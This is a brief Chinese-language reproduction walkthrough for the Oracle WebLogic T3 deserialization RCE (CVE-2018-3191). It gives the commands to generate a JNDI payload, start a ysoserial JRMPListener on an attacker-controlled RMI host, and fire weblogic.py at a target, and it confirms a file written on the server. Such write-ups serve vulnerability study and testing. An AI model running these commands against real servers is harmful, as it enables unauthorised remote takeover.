0x00 weblogic漏洞简介
北京时间10月17日,Oracle官方发布的10月关键补丁更新CPU(Critical Patch Update)中修复了一个高危的WebLogic远程代码执行漏洞(CVE-2018-3191)。该漏洞允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server,成功的漏洞利用可导致WebLogic Server被攻击者接管,从而造成远程代码执行。这个漏洞由Matthias Kaiser,loopx9,Li Zhengdong申报。
0x01复现准备
首先准备payload
java -jar weblogic-spring-jndi.jar rmi://攻击端ip:端口/Exp > payload.txt
然后搭建rmi服务器端
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 端口 CommonsCollections1 "要执行的指令"
0x02 复现
Python weblogic.py target_ip target_port payload.txt
此时rmi服务器那边能看到有连接
0x03 验证结果
此时可以看到1.txt写入了